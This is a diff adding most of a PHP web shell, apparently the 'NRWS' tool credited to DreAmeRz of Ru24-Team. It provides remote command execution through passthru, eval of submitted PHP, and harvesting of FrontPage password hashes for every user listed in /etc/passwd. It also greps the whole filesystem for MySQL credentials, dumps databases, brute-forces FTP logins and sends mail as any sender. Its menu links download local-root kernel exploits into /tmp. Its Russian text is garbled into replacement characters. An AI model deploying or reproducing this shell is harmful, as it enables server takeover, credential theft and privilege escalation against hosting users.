+switch($ac) {
+
+// Shell
+case "shell":
+echo "<SCRIPT LANGUAGE='JavaScript'>
+<!--
+function pi(str) {
+	document.command.cmd.value = str;
+	document.command.cmd.focus();
+}
+//-->
+</SCRIPT>";
+
+/* command execute */
+if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -lad"; }
+
+if (($_POST['alias']) AND ($_POST['alias']!==""))
+ {
+ foreach ($aliases as $alias_name=>$alias_cmd) {
+                                               if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;}
+                                               }
+ }
+
+
+echo "<font face=Verdana size=-2>����������� �������: <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
+echo "<b>";
+echo "<div align=center><textarea name=report cols=145 rows=20>";
+echo "".passthru($_POST['cmd'])."";
+echo "</textarea></div>";
+echo "</b>";
+?>
+</td></tr>
+
+<tr><b><div align=center>:: ���������� ������ �� ������� ::</div></b></font></td></tr>
+<tr><td height=23>
+<TR>
+	<CENTER>
+ <TD><A HREF="JavaScript:pi('cd ');" class=fcom>| cd</A> |</TD>
+	<TD><A HREF="JavaScript:pi('cat ');" class=fcom>| cat</A> |</TD>
+	<TD><A HREF="JavaScript:pi('echo ');" class=fcom>echo</A> |</TD>
+	<TD><A HREF="JavaScript:pi('wget ');" class=fcom>wget</A> |</TD>
+	<TD><A HREF="JavaScript:pi('rm ');" class=fcom>rm</A> |</TD>
+	<TD><A HREF="JavaScript:pi('mysqldump ');" class=fcom>mysqldump</A> |</TD>
+	<TD><A HREF="JavaScript:pi('who');" class=fcom>who</A> |</TD>
+	<TD><A HREF="JavaScript:pi('ps -ax');" class=fcom>ps -ax</A> |</TD>
+  <TD><A HREF="JavaScript:pi('cp ');" class=fcom>cp</A> |</TD>
+  <TD><A HREF="JavaScript:pi('pwd');" class=fcom>pwd</A> |</TD>
+ <TD><A HREF="JavaScript:pi('perl  ');" class=fcom>perl</A> |</TD>
+ <TD><A HREF="JavaScript:pi('gcc ');" class=fcom>gcc</A> |</TD>
+ <TD><A HREF="JavaScript:pi('locate ');" class=fcom>locate</A> |</TD>
+  <TD><A HREF="JavaScript:pi('find ');" class=fcom>find</A> |</TD>
+  <TD><A HREF="JavaScript:pi('ls -lad');" class=fcom>ls -lad</A> |</TD>
+       </CENTER>           	
+</TR>
+
+<?
+/* command execute form */
+echo "<form name=command method=post>";
+
+echo "<b>��������� �������</b>";
+echo "<input type=text name=cmd size=85><br>";
+echo "<b>������� ���������� &nbsp;</b>";
+if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=text name=dir size=85 value=".exec("pwd").">"; }
+else { echo "<input type=text name=dir size=85 value=".$_POST['dir'].">"; }
+echo "<input type=submit name=submit value=���������>";
+
+echo "</form>";
+
+/* aliases form */
+echo "<form name=aliases method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;�������� �����<font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<select name=alias>";
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ echo "<option>$alias_name</option>";
+ }
+ echo "</select>";
+if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
+else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
+echo "&nbsp;&nbsp;<input type=submit name=submit value=���������>";
+echo "</font>";
+echo "</form>";
+
+
+break;
+case "art":
+echo "<a href='?ac=frontpage'><b>FrontPage Exploit by Nitrex</b></a><br>
+�������� ��� FrontPage. �������� �������� .htpassword ����� �� ����� �������. ��������� ������� ������� ���� ���� ������ � ���� �����:������ �� �������, �� ���� ������ � FrontPage �������� � FTP � ������ �������� �������. ������������ ������������ � ������� John The Ripper (Standart/DES).<br><br>
+<a href='?ac=dbexploit'><b>MySQL Find Config Exploit by DreAmeRz</b></a><br>
+��������, ����������� ��������� ����� ������� � ���� ������. ������������ ����� ������ � ����������� ���� �����, ����������� �� ������� � MySQL. ����� �������� ���������� ������� � ������� ��������� �������. ������ � ����������� ������� ��� ����� �� �����������, ��� ����������� ��������� ����������. ��������������� �����, ��������� ����������, �� ������ ������� ������ � MySQL.<br><br>
+<a href='?ac=ftp'><b>FTP Brut by xoce</b></a><br>
+����������� ����������, ���������� �� ������ ����������� �������, ������� ����� �� �����. ���� ������������ ���, �� ������ ���������� ����� ������� �... ��� - ������� ����������!!! � ������� ������� ����������� �� ������� ��������� ������ � ������ �������� ��� �������! ����� ���� ��� ����������, ���� ��������� ���� �������, ������� ������������ �� ���� (�� ������ ������� ����� � ���������� �������, ��� ��� ��� ��������� �������� �� ������! 10000 ������ ������).<br><br>
+<a href='?ac=ftppass'><b>FTP login:login Brut by Terabyte</b></a><br>
+�������� ��������� ��������� ������� �� FTP �� ������ login:login. ��� ������ ������ � /etc/passwd, ��� ������ ����������� ������� ������ ���������.<br><br>
+<a href='?ac=shell'><b>��������� ������ ����-��������� ��������� ����� � �������.</b></a><br>";
+break;
+case "frontpage":
+$p=getenv("DOCUMENT_ROOT");
+if(exec("cat /etc/passwd")){
+$ex=explode("/", $p);
+$do_login=substr($p,0,strpos($p,$ex[2]));
+$next_login=substr($p,strpos($p,$ex[2])+strlen($ex[2]));
+exec("cat /etc/passwd", $passwd);
+for($i=0; $i<=count($passwd); $i++) {
+$xz=explode(":", $passwd[$i]);
+$file="/".$do_login.$xz[0].$next_login."/_vti_pvt/service.pwd";
+if(exec("cat ".$file)){
+exec("cat ".$file,$open);
+$a=$open[count($open)-1];
+$fr=strpos($a, ":");
+$open1=substr($a, $fr);
+if($xz[4]=='') {
+$file1="/".$do_login.$xz[0].$next_login."/_vti_pvt/.htaccess";
+Unset($domain);
+exec("cat ".$file1,$domain);
+$domain1=explode(" ",$domain[8]);
+$xz[4]=$domain1[1];
+}
+echo $xz[0].$open1.":".$xz[2].":".$xz[3].":".$xz[4].":".$xz[5].":".$xz[6]."<br>";
+} } 
+}
+elseif(is_file("/etc/passwd")){
+$ex=explode("/", $p);
+$passwd="/etc/passwd";
+echo "����:&nbsp".$p."<br>"; 
+$do_login=substr($p,0,strpos($p,$ex[2]));
+$next_login=substr($p,strpos($p,$ex[2])+strlen($ex[2]));
+if(is_file($passwd)) {
+$open=fopen($passwd,"r");
+while (!feof($open)) {
+$str=fgets($open, 100);
+$mas=explode(":", $str);
+$file="/".$do_login.$mas[0]."/".$next_login."/_vti_pvt/service.pwd";
+if(is_file($file)) {
+echo $mas[0];
+$open1=fopen($file, "r");
+$str1=fread($open1,filesize($file));
+fclose($open1);
+$fr=strpos($str1, ":");
+$str2=substr($str1, $fr);
+$str2=rtrim($str2);
+//
+if($mas[4]=='') {
+$file1="/".$do_login.$mas[0]."/".$next_login."/_vti_pvt/.htaccess";
+$open2=fopen($file1,"r");
+$domain=fread($open2,filesize($file1));
+fclose($open2);
+$domain1=substr($domain,106,110);
+$domain2=explode("AuthUserFile",$domain1);
+$mas[4]=$domain2[0];
+}
+//
+echo $str2.":".$mas[2].":".$mas[3].":".$mas[4].":".$mas[5].":".$mas[6]."<br>";
+}
+} 
+fclose($open);
+}
+}
+else{
+echo "� ������ ����� :(((";
+}
+break;
+case "dbexploit":
+echo "<PRE>";
+echo "<b>� ����� ������������ ������� mysql_connect: </b><br>";
+exec("find / -name *.php | xargs grep -li mysql_connect");
+exec("find / -name *.inc | xargs grep -li mysql_connect");
+exec("find / -name *.inc.php | xargs grep -li mysql_connect");
+echo "<b>� ����� ������������ ������� mysql_select_db: </b><br>";
+exec("find / -name *.php | xargs grep -li mysql_select_db");
+exec("find / -name *.inc | xargs grep -li mysql_select_db");
+exec("find / -name *.inc.php | xargs grep -li mysql_select_db");
+echo "<b>� ����� ������������ ���������� ������: </b><br>";
+exec("find / -name *.php | xargs grep -li $password");
+exec("find / -name *.inc | xargs grep -li $password");
+exec("find / -name *.inc.php | xargs grep -li $password");
+exec("find / -name *.php | xargs grep -li $pass");
+exec("find / -name *.inc | xargs grep -li $pass");
+exec("find / -name *.inc.php | xargs grep -li $pass");
+echo "<b>� ����� ������������ ����� localhost: </b><br>";
+exec("find / -name *.php | xargs grep -li localhost");
+exec("find / -name *.inc | xargs grep -li localhost");
+exec("find / -name *.inc.php | xargs grep -li localhost");
+echo "</PRE>"; 
+break;
+// ������ ���������
+case "ps":
+echo "<b>�������� � �������:</b><br>";
+ 
+  echo "<br>";
+  if ($pid)
+  {
+   if (!$sig) {$sig = 9;}
+   echo "����������� ������� ".$sig." to #".$pid."... ";
+   $ret = posix_kill($pid,$sig);
+   if ($ret) {echo "���, ������� ����, �����";}
+   else {echo "������! ".htmlspecialchars($sig).", � �������� #".htmlspecialchars($pid).".";}
+  }
+  $ret = `ps -aux`;
+  if (!$ret) {echo "���������� ���������� ������ ���������! �����, ���� ����� �������� ps";}
+  else
+  {
+   $ret = htmlspecialchars($ret);
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   if (empty($ps_aux_sort)) {$ps_aux_sort = $sort_default;}
+   if (!is_numeric($ps_aux_sort[0])) {$ps_aux_sort[0] = 0;}
+   $k = $ps_aux_sort[0];
+   if ($ps_aux_sort[1] != "a") {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."a\"></a>";}
+   else {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."d\"></a>";}
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$i.$ps_aux_sort[1]."\"><b>".$head[$i]."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+	{
+	 echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10,count($line)));
+     $line = array_slice($line,0,11);
+     $line[] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+   $head[$k] = "<b>".$head[$k]."</b>".$y;
+   $head[] = "<b>ACTION</b>";
+   $v = $ps_aux_sort[0];
+   usort($prcs,"tabsort");
+   if ($ps_aux_sort[1] == "d") {$prcs = array_reverse($prcs);}
+   $tab = array();
+   $tab[] = $head;
+   $tab = array_merge($tab,$prcs);
+   echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=white borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+   foreach($tab as $k)
+   {
+    echo "<tr>";
+    foreach($k as $v) {echo "<td>".$v."</td>";}
+    echo "</tr>";
+   }
+   echo "</table>";
+  }
+break;
+// exploits for root...
+case "exploits":
+// thanks to xoce
+$public_site = "http://hackru.info/adm/exploits/public_exploits";
+$private_site = "http://hackru.info/adm/exploits/private_exploits";
+echo"���� ������ ������ �� ���� ������. ��-������, ��� ������� ������ ���� � ���� ���������, ��-������ - �������������� � ����������� ������ ��� ���������� ��������� ��� ���� �� �������� ������������. ��� ��������� �������������� � ���������. ������ ������������� ���� ����, ������� �������������� �������� :) ������� ������������� xoce (hackru.info)<br><br>
+<a href='?ac=upload&file3=$public_site/m&file2=/tmp'>Local ROOT for linux 2.6.20 - mremap (./m)</a><br>
+<a href='?ac=upload&file3=$public_site/p&file2=/tmp'>Local ROOT for linux 2.6.20 - ptrace (./p)</a><br>
+<a href='?ac=upload&file3=$private_site/brk&file2=/tmp'>BRK - Local Root Unix 2.4.*(./brk)</a><br>
+<a href='?ac=upload&file3=$private_site/sortrace&file2=/tmp'>Traceroute v1.4a5 exploit by sorbo (./sortrace)</a><br>
+<a href='?ac=upload&file3=$private_site/root&file2=/tmp'>Local Root Unix 2.4.* (./root)</a><br>
+<a href='?ac=upload&file3=$private_site/sxp&file2=/tmp'>Sendmail 8.11.x exploit localroot (./sxp)</a><br>
+<a href='?ac=upload&file3=$private_site/ptrace_kmod&file2=/tmp'>Local Root Unix 2.4.* (./ptrace_kmod)</a><br>
+<a href='?ac=upload&file3=$private_site/mr1_a&file2=/tmp'>Local Root Unix 2.4.* (./mr1_a)</a><br><br>";
+echo "�������������: �������� � /tmp �� bash ����� � ���������� ����� �������.<br>
+������: cd /tmp; ./m - ���, �������� ����������, � ���� ��� ok, �� �� �������� ����� root'a!<br>
+���� ����� �� ��������� ����������� ���������, �� �������� <a href=http://www.web-hack.ru/exploits/>www.web-hack.ru/exploits/</a> � <a href=http://security.nnov.ru>security.nnov.ru</a>.";
+
+break;
+case "damp":
+
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
+  $db = @mysql_connect('localhost',$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+
+   if(@mysql_select_db($_POST['mysql_db'],$db))
+    {
+     // ���� � �����
+     $sql1  = "# MySQL dump created by NRWS\r\n";
+     $sql1 .= "# homepage: http://www.Ru24-Team.NET\r\n";
+     $sql1 .= "# ---------------------------------\r\n";
+     $sql1 .= "#     date : ".date ("j F Y g:i")."\r\n";
+     $sql1 .= "# database : ".$_POST['mysql_db']."\r\n";
+     $sql1 .= "#    table : ".$_POST['mysql_tbl']."\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+
+     // �������� ����� ������� �������� ��������� �������
+     $res   = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
+     $row   = @mysql_fetch_row($res);
+     $sql1 .= $row[1]."\r\n\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+
+     $sql2 = '';
+
+     // �������� ������ �������
+     $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
+     if (@mysql_num_rows($res) > 0) {
+     while ($row = @mysql_fetch_assoc($res)) {
+     $keys = @implode("`, `", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".$values."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     echo "<center><b>������! ���� ������ ������!</b></center>";
+    // ����� � ���� ��� ������� � �������
+    if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+    else { echo $sql1.$sql2; }
+    } // end if(@mysql_select_db($_POST['mysql_db'],$db))
+
+    else echo "����� �� ���!";
+   @mysql_close($db);
+   } // end if($db)
+  else echo "��� �������� c ��������!";
+ } // end if(($_POST['dif']&&$fp)||(!$_POST['dif'])){
+ else if(!empty($_POST['dif'])&&!$fp) { echo "������, ��� ���� ������ � ����!"; }
+
+break;
+// SQL Attack
+case "sql":
+echo "<form name='mysql_dump' action='?ac=damp' method='post'>";
+echo "&nbsp;����: &nbsp;<input type=text name=mysql_db size=15 value=";
+echo (!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"));
+echo ">";
+echo "&nbsp;�������: &nbsp;<input type=text name=mysql_tbl size=15 value=";
+echo (!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"));
+echo ">";
+echo "&nbsp;�����: &nbsp;<input type=text name=mysql_l size=15 value=";
+echo (!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"));
+echo ">";
+echo "&nbsp;������: &nbsp;<input type=text name=mysql_p size=15 value=";
+echo (!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"));
+echo ">";
+echo "<input type=hidden name=dir size=85 value=".$dir.">";
+echo "<input type=hidden name=cmd size=85 value=mysql_dump>";
+echo "<br>&nbsp;��������� ���� � �����: <input type=checkbox name=dif value=1 id=dif><input type=text name=dif_name size=85 value=";
+echo (!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"));
+echo ">";
+echo "<input type=submit name=submit value=���������>" ;
+echo "</font>";
+echo "</form>"; 
+ print "<tr><td>";
+###
+
+@$php_self=$_GET['PHP_SELF'];
+@$from=$_GET['from'];
+@$to=$_GET['to'];
+@$adress=$_POST['adress'];
+@$port=$_POST['port'];
+@$login=$_POST['login'];
+@$pass=$_POST['pass'];
+@$adress=$_GET['adress'];
+@$port=$_GET['port'];
+@$login=$_GET['login'];
+@$pass=$_GET['pass'];
+if(!isset($adress)){$adress="localhost";}
+if(!isset($login)){$login="root";}
+if(!isset($pass)){$pass="";}
+if(!isset($port)){$port="3306";}
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+?>
+
+<body vLink=white>
+<font color=black face=verdana size=1>
+<form>  <? if(!@$conn){ ?>
+<table><tr><td valign=top>
+<input type=hidden name=ac value=sql>
+<tr><td valign=top>����: </tr><td><input name=adress value='<?=$adress?>' size=20></td></tr>
+<tr><td valign=top>����: </tr><td><input name=port value='<?=$port?>' size=6></td></tr>
+<tr><Td valign=top>�����: </td><td><input name=login value='<?=$login?>' size=10></td></tr>
+<tr><Td valign=top>������: </td><td> <input name=pass value='<?=$pass?>' size=10>
+<input type=hidden name=p value=sql></td></tr>
+<tr><td></td><td><input type=submit name=conn value=������������></form></td></tr><?}?>
+<tr><td valign=top><? if(@$conn){ echo "<b>PHP v".@phpversion()."<br>mySQL v".@mysql_get_server_info()."<br>";}?></b></td><td>
+</td></tr>
+</table>
+<table width=100%><tr><td>
+<?
+@$conn=$_GET['conn'];
+@$adress=$_GET['adress'];
+@$port=$_GET['port'];
+@$login=$_GET['login'];
+@$pass=$_GET['pass'];
+if($conn){
+
+$serv = @mysql_connect("$adress:$port", "$login", "$pass") or die("������: ".mysql_error());
+if($serv){$status="���������. :: <a href='$php_self?conn=0'>����� �� ����</a>";}else{$status="��������.";}
+print "<b><font color=green>������: $status<br><br>";
+print "<table cellpadding=0 cellspacing=0><tr><td valign=top>";
+print "<font color=red>[�������]</font><Br><font color=white>";
+$res = mysql_list_dbs($serv);
+while ($str=mysql_fetch_row($res)){
+print "<b><a href='$php_self?ac=sql&base=1&db=$str[0]&p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a></b><br>";
+@$tc++;
+}
+$pro="&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+@$base=$_GET['base'];
+@$db=$_GET['db'];
+print "<font color=red>[����� ������: $tc]</font><br>$pro";
+if($base){
+print "<div align=left><font color=green>�������: [$tbl]</div></font><br>";
+$result=mysql_list_tables($db);
+while($str=mysql_fetch_array($result)){
+$c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
+$records=mysql_fetch_array($c);
+print "<font color=red>[$records[0]]</font> <a href='$php_self?ac=sql&inside=1&p=sql&vn=$str[0]&base=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a><br>";
+mysql_free_result($c);
+}
+} #end base
+
+@$vn=$_GET['vn'];
+print "</td><td valign=top>";
+print "<font color=green>���� ������: $db => $vn</font>";
+@$inside=$_GET['inside'];
+@$tbl=$_GET['tbl'];
+if($inside){
+print "<table cellpadding=0 cellspacing=1><tr>";
+
+mysql_select_db($db) or die(mysql_error());
+$c=mysql_query ("SELECT COUNT(*) FROM $tbl");
+$cfa=mysql_fetch_array($c);
+mysql_free_result($c);
+print "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>";
+print "
+�����: $cfa[0]<form>
+<input type=hidden name=ac value=sql>
+��: <input name=from size=3 value=0>
+��: <input name=to size=3 value=$cfa[0]>
+<input type=submit name=show value=��������>
+<input type=hidden name=inside value=1>
+<input type=hidden name=vn value=$vn>
+<input type=hidden name=db value=$db>
+<input type=hidden name=login value=$login>
+<input type=hidden name=pass value=$pass>
+<input type=hidden name=adress value=$adress>
+<input type=hidden name=conn value=1>
+<input type=hidden name=base value=1>
+<input type=hidden name=p value=sql>
+<input type=hidden name=tbl value=$tbl>
+ [<a href='$php_self?ac=sql&getdb=1&to=$cfa[0]&inside=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&base=1&p=sql&tbl=$tbl'>���������</a>]
+</form>";
+@$vn=$_GET['vn'];
+@$from=$_GET['from'];
+@$to=$_GET['to'];
+@$from=$_GET['from'];
+@$to=$_GET['to'];
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+$query = "SELECT * FROM $vn LIMIT $from,$to";
+$result = mysql_query($query);
+for ($i=0;$i<mysql_num_fields($result);$i++){
+$name=mysql_field_name($result,$i);
+print "<td>&nbsp;</td><td bgcolor=#BCE0FF> $name </td> ";
+}
+print "</tr>";
+while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
+print "<tr>";
+foreach ($mn as $come=>$lee) {
+$nst_inside=htmlspecialchars($lee);
+print "<td>&nbsp;</td><td bgcolor=silver>$nst_inside</td>\r\n";
+} print "</tr>";
+}
+mysql_free_result($result);
+print "</table>";
+
+} #end inside
+print "</td></tr></table>";
+} # end $conn
+
+
+###   end of sql
+print "</tr></td></table> </td></tr></table>";
+print $copyr;
+die;
+
+
+break;
+
+//PHP Eval Code execution
+case "eval":
+
+echo <<<HTML
+<b>���������� php-���� (��� "< ?  ? >")</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="eval">
+<tr>
+<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (isset($_POST['ephp'])){
+eval($_POST['ephp']);
+}
+break;
+
+// SEND MAIL
+case "sendmail":
+echo <<<HTML
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="sendmail">
+<tr>�� ����: <br>
+<input type="TEXT" name="frommail">
+<br>����:<br> <input type="TEXT" name="tomailz">
+<br>����: <br><input type="TEXT" name="mailtema">
+<br>�����: <br>
+<td><textarea name="mailtext" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="���������" name="submit"></td><form>
+$tend
+HTML;
+// ������� �������� �� ��������, � ����� ? =)
+if (isset($submit))
+{
+
+mail($tomailz,$mailtema,$mailtext,"From: $frommail");
+echo "<h2>��������� ����������!</h2>";
+}
+break;
+
+
+// ���������� � �������
+case "info":
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">��������</font>";
+}
+else {$safemode = false; $hsafemode = "���������</font>";}
+/* display information */
+echo "<b>[ ���������� � ������� ]</b><br>";
+echo "<b>����:</b> ".$_SERVER["HTTP_HOST"]."<br>" ;
+echo "<b>IP �������:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>";
+echo " <b>������: </b>".$_SERVER['SERVER_SIGNATURE']."  ";
+echo "<b>OC:</b> ".exec("uname -a")."(";
+print "".php_uname()." )<br>\n";
+echo "<b>���������:</b> ".exec("cat /proc/cpuinfo | grep GHz")."<br>";
+echo "<b>����������: </b>".exec("id")."<br>";
+echo "<b>����� �����: </b>" . (int)(disk_total_space(getcwd())/(1024*1024)) . " MB " . "<b>��������</b>: " . (int)(disk_free_space(getcwd())/(1024*1024)) . " MB <br>";
+echo "<b>������� �������:</b>".exec("pwd")."";
+echo " <br><b>������� web-����: </b>".@$_SERVER['PHP_SELF']."  ";
+echo "<br><b>���� IP:</b> ".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")<br>";
+echo "<b>PHP version: </b>".phpversion()."<BR>";
+echo "<b> ID ��������� �������: </b>".get_current_user()."<BR>";
+echo "<b>MySQL</b> : ".mysql_get_server_info()."<BR>";
+if(file_exists('/etc/passwd') && is_readable('/etc/passwd')){
+print '<b>���� ������ � /etc/passwd! </b><br>';
+}
+if(file_exists('/etc/shadow') && is_readable('/etc/shadow')){
+print '<b>���� ������ � /etc/shadow!</b> <br>';
+}
+if(file_exists('/etc/shadow-') && is_readable('/etc/shadow-')){
+print '<b>���� ������ � /etc/shadow-!</b> ';
+}
+if(file_exists('/etc/master.passwd') && is_readable('/etc/master.passwd')){
+print '<b>���� ������ � /etc/master.passwd! </b><br>';
+}
+if(isset($_POST['th']) && $_POST['th']!=''){
+chdir($_POST['th']);
+};
+if(is_writable('/tmp/')){
+$fp=fopen('/tmp/qq8',"w+");
+fclose($fp);
+print "/tmp - �������&nbsp;<br>\n";
+unlink('/tmp/qq8');
+}
+else{
+print "<font color=red>/tmp - �� �������</font><br>";
+}
+echo "<b>���������� �����: ".$hsafemode."</b><br>";
+if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   $num = $nixpasswd + $nixpwdperpage;
+   echo "<b>*nix /etc/passwd:</b><br>";
+   $i = $nixpasswd;
+   while ($i < $num)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid) {echo join(":",$uid)."<br>";}
+    $i++;
+   }
+  }
+  else {echo "<br><a href=?ac=navigation&d=/etc/&e=passwd><b><u>Get /etc/passwd</u></b></a><br>";}
+  if (file_get_contents("/etc/userdomains")) {echo "<b><a href=\"".$surl."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></b><br>";}
+  if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></b><br>";}
+  if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/usr/local/apache/conf&e=httpd.conf><u><b>������������ Apache (httpd.conf)</b></u></a></b><br>";}
+  { echo "<b><a href=?ac=navigation&d=/etc/httpd/conf&e=httpd.conf><u><b>������������ Apache (httpd.conf)</b></u></a></b><br>";}
+   if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/etc/&e=httpd.conf><u><b>������������ Apache (httpd.conf)</b></u></a></b><br>";}
+    if (file_get_contents("/etc/httpd.conf")) {echo "<b><a href=?ac=navigation&d=/var/cpanel&e=accounting.log><u><b>cpanel log  </b></u></a></b><br>";}
+ break;
+ 
+// � �������
+case "about":
+
+echo "<center><b>������ ����!</b><br><br>
+�������-�� NWRS �������� � ������ ���������� ������! ���������� ��������� ����� �������� ������������. ��� ������� ������� �������� � �������� ���������. ��������� ���������� ����������� ��� ������ �������. � �� �� ����� ��� ������ �������. ���, ��� ������������ - �������������. �����, ������ ������ � ������� ���-�� �������� ��� ����. ����� ������� � ���, ��� � �������� ������, ��� �� ������ ������ :) ����� ����� ��� ����������, php - �������� ����. �� ������ ����� ������ ������ ��� ������ � ���������� ������� ������ ����� ������, ����� ��� ��� ����, ��-�� ����� ��������� ����.
+��, � ������� ���� �����:  Nitrex, Terabyte, 1dt_wolf, xoce, FUF, Shift, dodbob, m0zg, Tristram, Sanchous (���������� � ������)... � ������ ������... �� ���� ����� ������� ��������� � ����� ����� ������������� ����������. �������� ������� ��!<br><br><b>�������: ��������� ���� ������ �� ����� ��������, �� ��������� ����� :) ��� ��� ����������.</b></center>";
+echo "<center><br><br><em>�������� ��� �����, � �� ������ ������ � ����� �������:</em><br><br>
+<a href='http://www.ru24-team.net'>www.ru24-team.net</a><br><br>
+<a href='http://www.web-hack.ru'>www.web-hack.ru</a><br><br>
+<a href='http://www.rst.void.ru'>www.rst.void.ru</a><br><br>
+<a href='http://www.hackru.info'>www.hackru.info</a><br><br>
+<a href='http://www.realcoding.net'>www.realcoding.net</a><br><br>
+<a href='http://www.ccteam.ru'>www.ccteam.ru</a><br><br>
+���������, ���� ���� �����.<br> <em>����� �� ����� ��������������� �� ���������, ����������� �� ���� ������, �c������ �� ��������� </em>:)
+<br><br><br><br><br><b>������ ���������������� �� �������� GNU GPL<br> 22 ���� 2005 �. &#169; DreAmeRz<br> e-mail:</b> <a href='mailto:dreamerz@mail.ru'>dreamerz@mail.ru</a><b> ICQ: </b>817312 <b>WEB: </b><a href='http://www.ru24-team.net'>http://www.Ru24-Team.NET</a>";
+break;
+
+// ��� ������ �������
+case "ftppass":
+
+$filename="/etc/passwd"; // passwd file
+$ftp_server="localhost"; // FTP-server
+
+echo "FTP-server: <b>$ftp_server</b> <br><br>";
+
+$fp = fopen ($filename, "r");
+if ($fp)
+{
+while (!feof ($fp)) { 
+$buf = fgets($fp, 100);
